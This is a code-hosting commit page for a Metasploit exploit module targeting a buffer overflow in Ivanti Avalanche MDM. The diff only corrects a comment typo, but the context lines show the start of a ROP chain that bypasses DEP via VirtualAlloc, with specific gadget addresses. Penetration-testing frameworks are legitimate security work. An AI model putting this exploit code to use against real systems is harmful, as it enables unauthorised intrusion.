We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent f96ca44 commit 9044588Copy full SHA for 9044588
modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -78,7 +78,7 @@ def check
78
def exploit
79
expected_payload_size = 622
80
81
- # This is a custom ROP chain for byspassing DEP via VirtualAlloc
+ # This is a custom ROP chain for bypassing DEP via VirtualAlloc
82
rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
83
rop_chain += [0x00001000].pack('V') # flAllocationType
84
rop_chain += [0x00499ac0].pack('V') # pop eax ; ret ;
0 commit comments